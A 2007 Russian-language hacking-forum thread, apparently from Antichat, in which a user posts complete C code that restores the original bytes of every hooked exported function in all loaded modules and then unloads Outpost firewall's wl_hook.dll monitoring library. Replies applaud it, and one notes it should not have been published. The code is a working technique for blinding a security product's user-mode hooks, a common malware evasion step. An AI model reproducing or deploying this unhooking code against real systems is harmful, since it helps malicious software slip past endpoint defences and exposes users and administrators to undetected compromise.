Unhook API всех модулей

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by KEZ, 7 Sep 2007.

  1. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Нужно было выгрузить Outpost'овскую wl_hook.dll, следящую за всякими FindWindowEx, DdeConnect и т.п. ф-иями взаимодействия с "чем-то"
    Анхукает все ф-ии из всех модулей, после чего убивает wl_hook.dll (для понту)

    Code:
    VOID UnhookMod( LPSTR lpModName ) {
	HANDLE	hFile, hMapping;
	HMODULE hMod;
	LPVOID	hMap;
	CHAR	lpSystemDir[MAX_PATH*2];
	ULONG	b;

	GetSystemDirectory( lpSystemDir, MAX_PATH-1 );
	lstrcat( lpSystemDir, "\\" );
	lstrcat( lpSystemDir, lpModName );
	hFile = CreateFile( lpSystemDir, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );

	if (hFile != INVALID_HANDLE_VALUE) {

		hMapping = CreateFileMapping( hFile, 0, PAGE_READONLY|SEC_IMAGE, 0, 0, 0 );
		if (hMapping != INVALID_HANDLE_VALUE) {

			hMap = MapViewOfFile( hMapping, FILE_MAP_READ, 0, 0, 0 );
			if (hMap) {

				IMAGE_DOS_HEADER *dh = (IMAGE_DOS_HEADER*)hMap;
				IMAGE_NT_HEADERS *nh = (IMAGE_NT_HEADERS*)((ULONG)hMap+dh->e_lfanew);
				IMAGE_FILE_HEADER *fh = (IMAGE_FILE_HEADER*)&nh->FileHeader;
				IMAGE_OPTIONAL_HEADER *oh = (IMAGE_OPTIONAL_HEADER*)&nh->OptionalHeader;
				IMAGE_EXPORT_DIRECTORY *ed = (IMAGE_EXPORT_DIRECTORY*)((ULONG)hMap+oh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
				ULONG *functionEntryPoints = (ULONG*)((ULONG)hMap+ed->AddressOfFunctions);

				BYTE entryPointBytes[10], originalBytes[10];

				for (int i = 0; i < ed->NumberOfFunctions; i++) {

					ULONG entryVA = oh->ImageBase+functionEntryPoints[i],
						  entryMA =	((ULONG)hMap+functionEntryPoints[i]);

					memcpy( originalBytes, (PVOID)entryMA, 10 );
					ReadProcessMemory( (HANDLE)-1, (LPVOID)entryVA, (LPVOID)entryPointBytes, 10, &b ); 

					if (memcmp( entryPointBytes, originalBytes, 10 ))
						WriteProcessMemory( (HANDLE)-1, (LPVOID)entryVA, (LPVOID)originalBytes, 10, &b );
				}
			}
		}
	}

	UnmapViewOfFile( hMap );
	CloseHandle( hMapping );
	CloseHandle( hFile );
}

VOID UnloadWLHook( VOID ) {
	MODULEENTRY32 me;
	HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, GetCurrentProcessId() );

	if (hSnapshot != INVALID_HANDLE_VALUE && Module32First( hSnapshot, &me )) {
		do {
			if (lstrcmp( me.szModule, "wl_hook.dll" )) UnhookMod( me.szModule );
		} while (Module32Next( hSnapshot, &me ));
	}

	CloseHandle( hSnapshot );
	FreeLibrary( GetModuleHandle( "wl_hook.dll" ) );
}
    ставьте плюсики я герой!!!!!!!!!!!
     
    #1 KEZ, 7 Sep 2007
    15 people like this.
  2. GlOFF

    GlOFF Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    689
    Likes Received:
    484
    Reputations:
    4
    Прикольно KEZ, оказывается вся фича в механизме експорта wl_hook.dll :)))

    Получи.... :)))
     
    #2 GlOFF, 7 Sep 2007
    1 person likes this.
  3. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    +100000
    P.S. Не надо было в паблик выкладывать )
     
    #3 z01b, 17 Sep 2007
    Last edited by a moderator: 18 Sep 2007
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.